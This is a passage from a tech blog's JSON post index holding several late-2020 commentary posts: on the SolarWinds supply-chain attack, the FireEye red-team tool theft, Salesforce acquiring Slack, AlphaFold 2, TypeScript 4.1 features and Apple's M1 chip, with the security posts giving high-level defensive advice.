think.\nPart of my Infrastructure Notes series, where reality keeps rearranging the furniture.\n","date":"24 December 2020","externalUrl":null,"permalink":"/posts/201224-centos-stream-shift/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Red Hat’s decision to shift CentOS from a stable downstream rebuild to a rolling upstream preview has sent shockwaves through the server community.","title":"CentOS Is Dead, Long Live CentOS Stream — What Now for Enterprise Linux?","type":"posts"},{"content":"The news that broke this week about the SolarWinds Orion compromise is, without exaggeration, one of the most significant cybersecurity events I\u0026rsquo;ve seen in my three decades of working in technology. Attackers — believed to be state-sponsored — managed to inject malicious code into SolarWinds\u0026rsquo; Orion platform build process, which then got distributed to roughly 18,000 organizations via routine software updates. Among the victims: US government agencies, Fortune 500 companies, and FireEye itself, which is how this was discovered in the first place. This incident would soon be followed by the White House convening the open source security summit to address systemic vulnerabilities in software supply chains.\nThis isn\u0026rsquo;t just another breach. This is an attack on the software supply chain — and it strikes at the very foundation of trust that our industry relies on. The supply chain security evolution that followed would address many of these gaps.\nWhat Actually Happened # The attackers compromised SolarWinds\u0026rsquo; build pipeline. They inserted a backdoor — now dubbed SUNBURST — into the Orion software updates distributed between March and June 2020. That means this malicious code has been sitting inside thousands of networks for months before anyone noticed.\nThe sophistication is remarkable. The malware was designed to mimic legitimate SolarWinds activity, used steganography to hide its communications, and included checks to avoid running in sandboxes or analysis environments. It would lay dormant for up to two weeks before activating. This wasn\u0026rsquo;t a smash-and-grab — it was a carefully planned, long-duration infiltration.\nThe SUNBURST backdoor communicated with command-and-control servers using DNS queries that looked like normal Orion telemetry. The subdomains encoded information about the victim\u0026rsquo;s environment, and the attackers could then selectively decide which targets to pursue further. It\u0026rsquo;s the kind of operation that requires immense patience and resources.\nThe Build Pipeline Is the New Attack Surface # What keeps me up at night about this isn\u0026rsquo;t just the scale — it\u0026rsquo;s the vector. The attackers didn\u0026rsquo;t break into each of those 18,000 organizations individually. They compromised the build system of a trusted vendor, and the victims essentially installed the backdoor themselves.\nThink about your own CI/CD pipeline for a moment. How many third-party dependencies does your build process pull in? How many build tools, plugins, and packages are involved? Do you verify the integrity of every artifact at every stage? I\u0026rsquo;m willing to bet most of us don\u0026rsquo;t — not thoroughly, anyway.\nI\u0026rsquo;ve been building software since the early \u0026rsquo;90s, and for most of that time, supply chain security was barely on anyone\u0026rsquo;s radar. We trusted our compilers, our package managers, our vendors. Ken Thompson warned us about this in his 1984 Turing Award lecture \u0026ldquo;Reflections on Trusting Trust\u0026rdquo;, and yet here we are, 36 years later, learning the lesson the hard way. Other major incidents like faker.js and colors.js would underscore how fragile our dependency chains really are.\nWhat This Means for Development Teams # If you\u0026rsquo;re running a development team right now, this should trigger some immediate actions:\nAudit your supply chain. Map out every external dependency in your build and deployment process. This isn\u0026rsquo;t just npm packages or Maven artifacts — it includes your CI/CD tooling, your infrastructure management platforms, your monitoring solutions. SolarWinds Orion is a network monitoring tool. It had privileged access by design.\nVerify build integrity. Implement reproducible builds where possible. Sign your artifacts. Compare checksums. If you\u0026rsquo;re using a package manager, enable lock files and verify package signatures. Consider tools like in-toto for supply chain integrity verification. SLSA frameworks would formalize these practices.\nLimit blast radius. Apply the principle of least privilege aggressively. Your monitoring tool shouldn\u0026rsquo;t have domain admin access. Your CI runner shouldn\u0026rsquo;t have production database credentials. Segment your networks so that a compromise of one system doesn\u0026rsquo;t automatically grant access to everything.\nMonitor egress traffic. Many organizations focus their security monitoring on inbound threats. Later security incidents reinforced the importance of egress monitoring. The SUNBURST backdoor communicated outbound via DNS — a channel that many firewalls allow unrestricted. DNS monitoring and anomaly detection should be part of your security posture.\nThe Vendor Trust Problem # Open source supply chain incidents would continue to highlight vendor trust challenges.\nThere\u0026rsquo;s a deeper philosophical issue here that our industry needs to reckon with. We operate in an ecosystem built on layers of trust. I trust my OS vendor, my cloud provider, my SaaS tools, my open-source dependencies. Each of those trusts is a potential link in a chain that can be exploited.\nThe uncomfortable truth is that there\u0026rsquo;s no complete solution to this problem. You can\u0026rsquo;t audit every line of code in every dependency and every vendor\u0026rsquo;s build system. But you can be more deliberate about where you place trust and what access you grant.\nZero-trust architecture isn\u0026rsquo;t just a buzzword — events like this give it real urgency. The assumption should be that any component could be compromised, and your architecture should be designed to detect and contain the damage when that happens.\nMy Take # I\u0026rsquo;ve been in this industry long enough to have seen plenty of \u0026ldquo;this changes everything\u0026rdquo; moments that didn\u0026rsquo;t actually change much. But this one feels different. The SolarWinds attack exposes a systemic vulnerability in how the entire software industry operates.\nThe fact that a routine software update from a trusted vendor was the attack vector — that\u0026rsquo;s the nightmare scenario we\u0026rsquo;ve been warned about for years. And the attacker\u0026rsquo;s tradecraft was good enough that it went undetected for nine months.\nWhat worries me most is that this might not be an isolated incident. If one build pipeline was compromised, how many others might be? We only know about this one because FireEye had the sophistication to detect it and the transparency to disclose it.\nAs developers and infrastructure engineers, we need to take supply chain security seriously — not as an abstract concern, but as an operational reality. That means investing in build integrity, minimizing trust boundaries, and building detection capabilities that assume breach rather than hoping for prevention.\nThe software we build is only as trustworthy as the weakest link in its supply chain. After this week, that\u0026rsquo;s a lesson none of us can afford to ignore.\nThis is part of my ongoing series on security in practice — because theory doesn\u0026rsquo;t stop nation-state actors.\n","date":"17 December 2020","externalUrl":null,"permalink":"/posts/201217-solarwinds-supply-chain-attack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The SolarWinds supply chain attack is a watershed moment for software security — and it has profound implications for how we build, ship, and trust code.","title":"SolarWinds Hack — Why Supply Chain Attacks Should Terrify Every Developer","type":"posts"},{"content":"FireEye, one of the most prominent cybersecurity firms in the world, disclosed this week that it was breached by what it describes as a \u0026ldquo;highly sophisticated state-sponsored adversary.\u0026rdquo; The attackers made off with FireEye\u0026rsquo;s proprietary red team tools — the same arsenal the company uses to test its clients\u0026rsquo; defenses. If you work in security, or if your organization uses FireEye\u0026rsquo;s tools or services, this is a significant event. But even if you don\u0026rsquo;t, this breach carries lessons worth understanding.\nWhat Was Stolen # FireEye\u0026rsquo;s red team tools are essentially an offensive toolkit — software designed to simulate real-world attacks against networks, applications, and infrastructure. Think of them as a professionally maintained, well-documented collection of exploitation techniques. Red team engagements are a standard part of security assessment: you hire experts to attack your organization using the same techniques real adversaries would use, then fix whatever they find.\nWhen these tools are in the hands of a defensive security company operating under strict rules of engagement, they\u0026rsquo;re a force for improving security. When they\u0026rsquo;re in the hands of actual adversaries, they\u0026rsquo;re weapons. The stolen tools reportedly include scripts, custom implants, and frameworks for exploiting known vulnerabilities — not zero-days, according to FireEye, but sophisticated implementations of known techniques.\nFireEye has taken the unusual step of publishing countermeasures — detection signatures, YARA rules, and Snort rules — that organizations can use to detect if the stolen tools are being used against them. This is the right move, and credit to FireEye for the transparency.\nWhy This Matters Beyond FireEye # Security tools in adversarial hands are a recurring nightmare for the industry. The precedent everyone remembers is the Shadow Brokers leak of NSA tools in 2017, which included EternalBlue — the exploit that powered ransomware outbreaks. This class of supply chain weaponization has continued with tools and access being the primary targets.\nThe FireEye tool theft is different in scale (these aren\u0026rsquo;t zero-day exploits for unpatched vulnerabilities) but the dynamic is similar. The tools lower the barrier for adversaries. Attacks that previously required significant expertise to develop can now be executed by less sophisticated actors who simply run the stolen tooling.\nFor defenders, this means another set of attack patterns to watch for. If you run a SOC (Security Operations Center), you should be ingesting FireEye\u0026rsquo;s published countermeasures immediately. If you\u0026rsquo;re a smaller organization without a SOC, make sure your security vendor or MSSP is aware and updating their detection capabilities.\nThe Attribution Question # FireEye attributes the attack to a nation-state actor, and early indications point toward Russia\u0026rsquo;s SVR (external intelligence service). The sophistication of the attack — FireEye describes novel techniques specifically designed to evade their own security tools and forensic investigations — suggests an adversary with significant resources and patience.\nThis is notable because FireEye is not an easy target. They are literally in the business of detecting and responding to sophisticated intrusions. If a state-sponsored adversary can breach FireEye, the uncomfortable implication is that no organization is immune. The security industry has always known this intellectually, but having it demonstrated so publicly is a sobering reminder.\nThe attack also reportedly involved compromise of FireEye\u0026rsquo;s supply chain — though details are still emerging. If confirmed, this would fit a broader trend of attackers targeting the supply chain rather than the target directly. It\u0026rsquo;s often easier to compromise a trusted vendor or tool than to breach a well-defended target\u0026rsquo;s perimeter.\nPractical Steps for Engineering Teams # Even if you\u0026rsquo;re not directly a FireEye customer, there are practical takeaways:\nIngest the countermeasures: FireEye\u0026rsquo;s published GitHub repository with detection rules is immediately actionable. If you use Snort, YARA, or ClamAV, grab the signatures. If you use an EDR solution, check with your vendor about incorporating these detections.\nAudit your known vulnerability exposure: The stolen tools target known CVEs, not zero-days. This means patching remains your single most effective defense. Review your vulnerability management program. Are there known CVEs that have been on the \u0026ldquo;we\u0026rsquo;ll get to it\u0026rdquo; list for months? Now is the time.\nReview supply chain trust: This breach reportedly involved supply chain compromise. Take inventory of the software and services that have privileged access to your infrastructure. Update dependencies, verify integrity of installed software, and ensure your vendor management process includes security assessments.\nAssume breach mentality: If FireEye can be breached, your organization can too. Invest in detection and response capabilities, not just prevention. Make sure you have logging, alerting, and incident response procedures that assume the perimeter has been bypassed.\nMy Take # I\u0026rsquo;ve worked in environments where FireEye was part of our security stack, and I know many teams that rely on their tools and threat intelligence. This breach is uncomfortable precisely because it targets a company that should be among the hardest to breach. But there\u0026rsquo;s a reason the security community has been saying \u0026ldquo;assume breach\u0026rdquo; for years — it\u0026rsquo;s not a platitude, it\u0026rsquo;s an operational reality.\nWhat I respect about FireEye\u0026rsquo;s response is the transparency. Publishing countermeasures immediately, disclosing the scope of what was stolen, and providing actionable detection rules — this is how a security company should handle a breach. The contrast with companies that hide breaches for months or downplay their severity is stark.\nThe broader lesson is one that bears repeating: security is not a product you can buy, it\u0026rsquo;s a practice you maintain. No tool, no vendor, no amount of spending makes you impervious. What matters is how quickly you detect intrusions, how effectively you respond, and how honestly you assess your own defenses. FireEye\u0026rsquo;s breach is a reminder that even the experts get caught. The question is always: what happens next?\nI have a feeling this story isn\u0026rsquo;t over. The supply chain angle, in particular, deserves close attention in the coming weeks.\n","date":"10 December 2020","externalUrl":null,"permalink":"/posts/201210-fireeye-breach-red-team-tools/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"FireEye discloses that sophisticated attackers stole their red team tools. The implications for the security industry — and every organization using those tools — are serious.","title":"FireEye Breach — When the Red Team Gets Red-Teamed","type":"posts"},{"content":"Salesforce announced this week that it\u0026rsquo;s acquiring Slack for $27.7 billion. That\u0026rsquo;s a staggering number for a messaging application — roughly the GDP of a small country — and it immediately raises the question: what does a CRM giant want with a chat tool? The answer has more to do with the future of enterprise software platforms than it does with messaging, and developers who rely on Slack as part of their daily workflow should be paying attention.\nThe Platform Play # Slack isn\u0026rsquo;t just a chat application. Over the past few years, it\u0026rsquo;s evolved into a platform — a hub where developers integrate monitoring alerts, CI/CD notifications, incident management, deployment approvals, and countless other workflows. For many development teams, Slack is the closest thing to a unified operations dashboard. PagerDuty alerts land in Slack. GitHub notifications flow into Slack. Deployment pipelines report their status in Slack.\nSalesforce sees this exactly for what it is: a platform with deep hooks into how companies actually work. The CRM market is maturing, and Salesforce needs a broader platform play to compete with Microsoft\u0026rsquo;s ecosystem (which has Teams, Azure, GitHub, LinkedIn, and Office all working together). Buying Slack gives Salesforce a collaboration hub they can wire into their entire product suite.\nFor developers, this acquisition matters because Slack\u0026rsquo;s role as an integration platform depends heavily on its API ecosystem and its willingness to play nicely with third-party tools. Under independent Slack, the incentive was clear — more integrations meant more value meant more users. Under Salesforce, the incentives may shift. Will Salesforce prioritize integrations with its own products over third-party tools? Will the Slack API remain as open and developer-friendly?\nThe Microsoft Teams Shadow # It\u0026rsquo;s impossible to discuss this acquisition without acknowledging Microsoft Teams, which has been eating into Slack\u0026rsquo;s market share aggressively, particularly since the pandemic drove remote work adoption through the roof. Microsoft bundles Teams with Office 365 — essentially making it free for any organization already paying for Microsoft\u0026rsquo;s productivity suite. That\u0026rsquo;s a brutal competitive dynamic for a company that charges per user per month.\nSlack\u0026rsquo;s DAU numbers have been growing, but Teams reported 115 million daily active users in October. The bundling strategy is working. For many enterprises, the path of least resistance is to use what\u0026rsquo;s already included in their Microsoft subscription rather than paying separately for Slack.\nSalesforce\u0026rsquo;s deep enterprise relationships might give Slack a distribution channel it needs. Every Salesforce customer — and there are hundreds of thousands of them — could become a Slack customer. But the flip side is that Slack\u0026rsquo;s identity as an independent, developer-loved tool starts to erode when it becomes a feature of a CRM platform.\nWhat History Tells Us About Enterprise Acquisitions # I\u0026rsquo;ve watched enough enterprise acquisitions over three decades to recognize the pattern. The acquirer always promises to maintain the acquired product\u0026rsquo;s independence and developer community. And for a year or two, they usually do. Then the integration pressure builds — shared authentication, unified billing, cross-product features — and the acquired product gradually becomes more tightly coupled with the parent\u0026rsquo;s ecosystem.\nGitHub\u0026rsquo;s acquisition by Microsoft in 2018 is the optimistic counterexample. Two years later, GitHub has arguably gotten better — more features, free private repos, GitHub Actions, Codespaces. But Microsoft had strong strategic reasons to keep GitHub independent: they needed developer trust, and heavy-handed integration would have destroyed it.\nSalesforce\u0026rsquo;s calculus is different. Their customers are primarily sales and business teams, not developers. The pressure to integrate Slack deeply with Salesforce\u0026rsquo;s CRM, marketing, and analytics products will be enormous. Keeping the developer experience pristine is unlikely to be the top priority.\nPractical Implications for Development Teams # If your team relies heavily on Slack integrations as part of your development workflow, now is a reasonable time to evaluate your dependency. I\u0026rsquo;m not suggesting everyone should migrate away from Slack tomorrow — that would be premature. But consider:\nIntegration portability: Are your Slack integrations built on abstractions that could target other platforms (Discord, Teams, Mattermost), or are they deeply Slack-specific? If you\u0026rsquo;re using Slack\u0026rsquo;s proprietary Block Kit for interactive workflows, you\u0026rsquo;re more locked in than you think.\nSelf-hosted alternatives: Tools like Mattermost and Rocket.Chat offer open-source, self-hosted alternatives with Slack-compatible webhook APIs. For teams with sensitive data or regulatory requirements, the acquisition might accelerate interest in self-hosted options.\nBot and workflow migration: If you\u0026rsquo;ve built custom Slack bots using the Bolt framework, take stock of the complexity. Most Slack bots are simple enough to reimplement for another platform in a day or two. The expensive ones are the interactive workflow bots with persistent state — those warrant more careful planning.\nMy Take # The Salesforce-Slack deal is a symptom of a broader trend: the consolidation of developer tools into larger platform ecosystems. Microsoft has GitHub, Azure, and Teams. Google has GCP and Workspace. Now Salesforce has Slack. The era of best-of-breed independent tools is giving way to integrated platform suites.\nThis isn\u0026rsquo;t inherently bad — integration between tools has real value — but it does mean that developers need to think more carefully about platform lock-in. Every tool you adopt is increasingly a vote for an entire ecosystem. Choose Slack and you\u0026rsquo;re now in Salesforce\u0026rsquo;s orbit. Choose Teams and you\u0026rsquo;re in Microsoft\u0026rsquo;s. Choose nothing and you lose the productivity benefits of integration.\nMy instinct is to build on open standards and abstractions wherever possible. Use webhooks rather than proprietary APIs. Keep your notification and workflow logic in your own infrastructure rather than embedding it in a third-party platform. The specific tools will change — they always do — but well-abstracted integrations survive platform transitions.\nTwenty-seven billion dollars is a lot of money for a chat app. But Salesforce isn\u0026rsquo;t buying a chat app. They\u0026rsquo;re buying a position in the collaboration platform war. Developers are collateral in that transaction, not the target audience.\n","date":"3 December 2020","externalUrl":null,"permalink":"/posts/201203-salesforce-acquires-slack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Salesforce’s $27.7 billion acquisition of Slack signals a consolidation wave in enterprise software. Developers should pay attention.","title":"Salesforce Buys Slack — What It Means for Developer Tooling","type":"posts"},{"content":"Every few years, something happens in AI that makes you sit up and pay attention — not the usual incremental benchmark improvement or marketing-inflated demo, but a genuine scientific breakthrough. DeepMind\u0026rsquo;s AlphaFold 2 results at CASP14 (the Critical Assessment of protein Structure Prediction competition) this week might be the most significant AI achievement since the original AlphaGo moment in 2016.\nThe numbers are almost absurd. AlphaFold 2 achieved a median Global Distance Test (GDT) score of 92.4 out of 100 across all target proteins — a score that the CASP organizers describe as competitive with experimental methods like X-ray crystallography. To put this in context: the protein folding problem has been one of biology\u0026rsquo;s grand challenges for fifty years. Computational approaches have been chipping away at it for decades, and in a single leap, DeepMind has essentially solved it.\nWhy Protein Folding Matters # For those of us coming from a software engineering background rather than biology, here\u0026rsquo;s why this matters. Proteins are molecular machines that do essentially everything in living organisms. Their function is determined by their 3D structure, which is determined by the sequence of amino acids that make up the protein. Predicting the 3D structure from the amino acid sequence — the \u0026ldquo;folding problem\u0026rdquo; — has been a fundamental open question in biology.\nExperimental methods for determining protein structures (X-ray crystallography, NMR spectroscopy, cryo-EM) are expensive, slow, and don\u0026rsquo;t work for every protein. There are roughly 200 million known proteins, but structures have been experimentally determined for only about 170,000 of them. If you can computationally predict protein structures accurately, you unlock the ability to understand — and potentially design — proteins at a scale that was previously impossible.\nThe implications for drug discovery, enzyme engineering, and fundamental biological research are enormous. Understanding how a protein folds tells you how it works, which tells you how to design molecules that interact with it — which is basically what drug design is.\nThe Technical Architecture # What we know so far about AlphaFold 2 (DeepMind hasn\u0026rsquo;t published the full paper yet) suggests an approach that combines several techniques: attention-based neural network architectures operating on multiple sequence alignments, an iterative refinement process that progressively improves the predicted structure, and end-to-end training that directly optimizes for structural accuracy.\nThe attention mechanism is particularly interesting from an AI perspective. Transformers and attention-based architectures have been dominating NLP over the past two years — GPT-3, BERT, and their variants. AlphaFold 2 demonstrates that these architectural ideas transfer powerfully to domains far removed from text processing. The relationships between amino acids in a protein sequence have a structural similarity to the relationships between words in a sentence — there are long-range dependencies, contextual effects, and hierarchical patterns.\nDeepMind also appears to have developed novel techniques for handling the geometric constraints of 3D protein structures. This isn\u0026rsquo;t a trivial thing to get right — predicting coordinates in 3D space that satisfy physical and chemical constraints is a fundamentally different problem from predicting the next word in a sentence.\nWhat This Tells Us About AI Progress # I\u0026rsquo;ve been tracking AI developments closely, and AlphaFold 2 stands out because it follows a pattern we should expect to see more of: taking architectural innovations from one domain (NLP, in this case) and applying them to achieve breakthroughs in completely different domains.\nThis is significant for a few reasons. First, it validates the intuition that attention mechanisms and transformer architectures capture something fundamentally useful about the structure of complex data — not just language. Second, it demonstrates that domain expertise still matters enormously. DeepMind didn\u0026rsquo;t just throw a bigger model at more data. They designed an architecture specifically tailored to the geometry and biology of protein structures.\nThe lesson for those of us working with AI in more mundane applications (and most of our applications are mundane compared to protein folding) is that the most impactful results come from combining powerful general architectures with deep domain knowledge. The next breakthrough in your field probably won\u0026rsquo;t come from a bigger GPT — it\u0026rsquo;ll come from someone who understands both the ML technique and the problem domain deeply enough to see how they connect.\nThe Open Questions # The CASP results are remarkable, but there\u0026rsquo;s nuance worth noting. AlphaFold 2 is not perfect for every category of protein. It struggles more with protein complexes (multiple proteins interacting) and with proteins that don\u0026rsquo;t have many known evolutionary relatives (since multiple sequence alignments are a key input). The accuracy, while revolutionary, also isn\u0026rsquo;t quite at the level needed for some drug-design applications where you need sub-angstrom precision.\nMore importantly, predicting structure is not the same as understanding folding. AlphaFold 2 can tell you what a protein looks like when folded, but not necessarily how it gets there or why it folds that way. The biophysics of protein folding remains an active and important research area.\nMy Take # As someone who primarily works in software engineering rather than computational biology, I find AlphaFold 2 inspiring for a different reason than the biology. It\u0026rsquo;s a reminder that AI — despite the hype cycles and inflated expectations — is capable of producing genuine, world-changing scientific results when applied rigorously to well-defined problems.\nThe contrast with much of what passes for \u0026ldquo;AI\u0026rdquo; in the tech industry could not be sharper. While we debate whether GPT-3 can write a decent email, DeepMind just accelerated biological research by potentially decades. The difference? A clearly defined problem with objective success criteria, deep domain expertise, and patient, focused engineering.\nThis is the kind of AI application that makes me optimistic about the field\u0026rsquo;s long-term trajectory, even when I\u0026rsquo;m skeptical about the nearest-term hype. The tools we\u0026rsquo;re building — attention mechanisms, large-scale neural networks, differentiable programming — are genuinely powerful. The question is always whether we\u0026rsquo;re pointing them at problems that matter.\n","date":"26 November 2020","externalUrl":null,"permalink":"/posts/201126-alphafold2-protein-folding-breakthrough/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"DeepMind’s AlphaFold 2 achieves near-experimental accuracy in protein structure prediction at CASP14. This is what AI breakthroughs actually look like.","title":"AlphaFold 2 — DeepMind Cracks the Protein Folding Problem","type":"posts"},{"content":"The TypeScript team shipped version 4.1 this week, and this one feels significant. While every TypeScript release brings incremental improvements, 4.1 introduces features that fundamentally expand what you can express in the type system — most notably template literal types, key remapping in mapped types, and recursive conditional types. This continues the steady evolution started with TypeScript 3.8’s private fields. These aren’t just academic niceties; they solve real problems that TypeScript developers have been working around for years.\nTemplate Literal Types # The headline feature is template literal types. Just as JavaScript has template literal strings (`Hello, ${name}`), TypeScript now has template literal types:\ntype EventName = `on${Capitalize\u0026lt;string\u0026gt;}`; // matches \u0026#34;onClick\u0026#34;, \u0026#34;onFocus\u0026#34;, \u0026#34;onAnything\u0026#34;, etc. This sounds simple, but the implications are profound. You can now type string manipulation at the type level. Consider how many APIs are string-based - event names, CSS properties, route patterns, environment variable names, database column mappings. Previously, you either typed these as string (losing all type safety) or manually enumerated every possible value (tedious and error-prone).\nWith template literal types, you can derive string types programmatically. If you have a type with keys \u0026quot;name\u0026quot; | \u0026quot;age\u0026quot; | \u0026quot;email\u0026quot;, you can automatically generate \u0026quot;getName\u0026quot; | \u0026quot;getAge\u0026quot; | \u0026quot;getEmail\u0026quot; at the type level. ORMs, API clients, and event systems can now provide precise types for string-based interfaces without maintaining enormous type definition files by hand.\nKey Remapping in Mapped Types # The as clause in mapped types is the kind of feature that makes library authors weep with joy. Previously, mapped types could transform the values of an object type but not the keys. Now you can:\ntype Getters\u0026lt;T\u0026gt; = { [K in keyof T as `get${Capitalize\u0026lt;string \u0026amp; K\u0026gt;}`]: () =\u0026gt; T[K] }; Combined with template literal types, this gives you surgical control over type transformations. If you\u0026rsquo;ve ever built a TypeScript wrapper around a legacy API and struggled to make the types line up with string-manipulated property names, you\u0026rsquo;ll immediately see the value.\nRecursive Conditional Types # TypeScript has had conditional types since version 2.8, but they couldn\u0026rsquo;t reference themselves - no recursion allowed. Version 4.1 lifts this restriction, enabling types that can traverse deeply nested structures:\ntype DeepReadonly\u0026lt;T\u0026gt; = { readonly [K in keyof T]: T[K] extends object ? DeepReadonly\u0026lt;T[K]\u0026gt; : T[K] }; This was technically possible before through workarounds (usually involving a chain of helper types), but native recursion is cleaner and handles arbitrary depth. It\u0026rsquo;s particularly useful for typing JSON-like structures, deeply nested configuration objects, and tree data structures.\nThe TypeScript team has added depth limits to prevent infinite recursion from crashing the compiler, which is a pragmatic engineering decision. You\u0026rsquo;ll hit a wall at extremely deep types, but for real-world use cases, the limits are generous enough.\nThe Trend Line # What strikes me about TypeScript\u0026rsquo;s trajectory is how it keeps finding practical improvements that make the type system more expressive without making the language harder to learn. Template literal types are powerful, but you don\u0026rsquo;t need to understand them to write TypeScript. They\u0026rsquo;re a tool for library authors and advanced users, while everyday consumers of those libraries just see better autocomplete and more helpful error messages.\nI\u0026rsquo;ve been writing TypeScript since version 1.8, and the language today is almost unrecognizable compared to those early days. The type system has evolved from \u0026ldquo;JavaScript with basic type annotations\u0026rdquo; to one of the most sophisticated type systems in mainstream use. Each release makes it harder to argue that dynamic typing is \u0026ldquo;good enough\u0026rdquo; for large codebases. The Node.js ecosystem has been adopting TypeScript at an accelerating pace, and releases like 4.1 reinforce why.\nThe 4.x series in particular has been impressive. Version 4.0 brought variadic tuple types and labeled tuple elements. Now 4.1 adds template literal types and recursive conditionals. The type system is approaching a level where you can encode complex business rules entirely in types - validating not just that something is a string, but that it\u0026rsquo;s a string matching a specific pattern.\nMy Take # I\u0026rsquo;ve worked on projects in both dynamically and statically typed languages, and I\u0026rsquo;ve long believed the debate is more about tradeoffs than absolute superiority. But TypeScript keeps shifting the calculus. With each release, the cost of type safety goes down - you can express more with less boilerplate - while the benefits go up.\nTemplate literal types in particular feel like they close a major gap. So much of modern web development is string-manipulation-heavy - routing, event handling, CSS-in-JS, database queries - and those were exactly the areas where TypeScript\u0026rsquo;s type system fell short. Not anymore.\nFor teams evaluating TypeScript adoption, the 4.1 release removes another category of \u0026ldquo;we can\u0026rsquo;t type this properly\u0026rdquo; objections. For teams already using TypeScript, it\u0026rsquo;s worth upgrading just for the improved type inference and the new --noUncheckedIndexedAccess flag, which catches a whole class of \u0026ldquo;possibly undefined\u0026rdquo; bugs that previously slipped through.\nIf you\u0026rsquo;re starting a new Node.js project in 2020 and not at least considering TypeScript, you\u0026rsquo;re leaving significant value on the table. The language evolution happening here is a key differentiator for modern JavaScript development.\n","date":"19 November 2020","externalUrl":null,"permalink":"/posts/201119-typescript-4-1-template-literal-types/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"TypeScript 4.1 ships template literal types, key remapping, and recursive conditional types - pushing the boundaries of what a type system can express.","title":"TypeScript 4.1 - Template Literal Types and the March Toward Type Safety","type":"posts"},{"content":"Two days ago, Apple officially unveiled the M1 — their first custom silicon for the Mac. After months of anticipation since the WWDC announcement in June, we now have concrete hardware: a MacBook Air, a 13-inch MacBook Pro, and a Mac Mini, all running on Apple\u0026rsquo;s own ARM-based chip. The benchmarks circulating online are, frankly, hard to believe. But having watched platform transitions before, I know the real story isn\u0026rsquo;t about benchmark numbers — it\u0026rsquo;s about what happens to our development workflows.\nThe Performance Claims # Apple claims the M1 delivers up to 3.5x faster CPU performance and up to 6x faster GPU performance compared to the previous generation, all while consuming significantly less power. The unified memory architecture — where CPU, GPU, and Neural Engine share a single pool of memory — is a genuine architectural departure from what we\u0026rsquo;re used to on x86 machines.\nEarly reports from developers who got their hands on review units suggest these aren\u0026rsquo;t just marketing numbers. Xcode compilation times are reportedly cut in half or better. The fanless MacBook Air apparently handles sustained workloads that would have the Intel version thermal throttling within minutes.\nFor those of us who\u0026rsquo;ve spent years listening to laptop fans spin up during Docker builds, this is noteworthy.\nRosetta 2 and the Transition Period # Apple\u0026rsquo;s translation layer, Rosetta 2, is the bridge that makes this transition viable. It translates x86_64 binaries to ARM on the fly, and by most accounts, it does so with remarkably little performance penalty. Some translated apps reportedly run faster on the M1 than they did natively on Intel Macs.\nBut translation layers have limits. I remember the original Rosetta during the PowerPC-to-Intel transition in 2006. It worked, but there were always edge cases — apps that behaved slightly differently, performance cliffs in specific workloads, plugins that refused to cooperate. We should expect similar rough edges here.\nThe bigger concern for developers is the toolchain. Homebrew doesn\u0026rsquo;t fully support ARM yet. Docker Desktop for Apple Silicon isn\u0026rsquo;t available at launch. Many development dependencies — database engines, language runtimes, native extensions — need to be recompiled or may have subtle compatibility issues. If your workflow involves running Linux containers (and whose doesn\u0026rsquo;t these days?), you\u0026rsquo;ll be dealing with architecture mismatches between your ARM host and x86_64 container images.\nWhat This Means for the Broader Ecosystem # The M1 isn\u0026rsquo;t just an Apple story. It\u0026rsquo;s an inflection point for ARM in professional computing. AWS has been pushing their Graviton2 ARM instances for months now, and the price-performance numbers there are compelling. Custom silicon evolution would accelerate across vendors. With Apple validating ARM for high-end laptop workloads, the pressure on the broader industry to take ARM seriously on the desktop just increased dramatically.\nFor those of us building server-side software, this creates an interesting dynamic. If a significant portion of developers start working on ARM machines daily, there\u0026rsquo;s a natural push toward ensuring your server workloads also run well on ARM. The Docker containerization ecosystem matured to handle multi-architecture deployments. Multi-architecture builds become a necessity rather than a nice-to-have. CI/CD pipelines need to test on both architectures.\nI\u0026rsquo;ve been running some workloads on Graviton2 instances for cost savings, and the experience has been mostly smooth for compiled languages like Go and Rust. Interpreted languages and managed runtimes (Python, Node.js, Java) generally don\u0026rsquo;t care about the underlying architecture. The pain points are always native dependencies — C extensions, system libraries, anything that needs to be compiled for the target architecture.\nThe Docker Question # This is the elephant in the room for many developers. Docker has announced they\u0026rsquo;re working on Apple Silicon support, but it\u0026rsquo;s not ready yet. For anyone whose daily workflow involves spinning up containers — which in 2020 is most backend developers — this is a significant gap at launch.\nThe technical challenge is real. Docker on macOS already runs Linux in a lightweight VM. On ARM hardware, that VM needs to be an ARM Linux VM, which means your containers run as ARM containers. If your production environment is x86_64 (and it almost certainly is), you\u0026rsquo;ve introduced an architecture mismatch in your development flow. QEMU-based emulation can bridge this gap, but at a performance cost.\nMy recommendation: if you\u0026rsquo;re considering an M1 Mac right now, wait a few months. Let the ecosystem catch up. Platform engineering maturity eventually standardized multi-architecture support. The hardware isn\u0026rsquo;t going anywhere, and by Q1 2021, we\u0026rsquo;ll have a much clearer picture of which tools have solid ARM support and which are still struggling.\nMy Take # I\u0026rsquo;ve been doing this long enough to have lived through multiple platform transitions — 68k to PowerPC, PowerPC to Intel, 32-bit to 64-bit. They always follow the same pattern: impressive initial hardware, a messy transition period, and then a new normal that\u0026rsquo;s genuinely better than what came before.\nThe M1 looks like it could deliver on the promise of better performance with better battery life, which would be a meaningful quality-of-life improvement for developers. But the transition tax is real. If your livelihood depends on a reliable development environment, being an early adopter of a new CPU architecture is a risky proposition.\nThat said, the trajectory is clear. ARM is coming to mainstream computing, and Apple just accelerated the timeline considerably. Start thinking about multi-architecture support in your build pipelines now. Test your applications on ARM. Make sure your Docker images are multi-arch. The developers who prepare for this transition early will have the smoothest ride.\nThe Mac has always been popular among developers. When those developers start filing bugs and submitting patches for ARM compatibility, the entire open-source ecosystem benefits. In that sense, the M1 might be one of the most consequential hardware launches for software development in years — not because of what it does today, but because of what it forces the ecosystem to support tomorrow.\n","date":"12 November 2020","externalUrl":null,"permalink":"/posts/201112-apple-m1-developer-impact/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Apple just shipped their first ARM-based Mac chips. The M1 looks impressive on paper, but what does this transition actually mean for developers?","title":"Apple M1 — What ARM-Based Macs Mean for Developers","type":"posts"},{"content":"It\u0026rsquo;s been about four months since OpenAI opened the GPT-3 API to beta users, and the initial wave of \u0026ldquo;look what I made GPT-3 do\u0026rdquo; tweets has settled 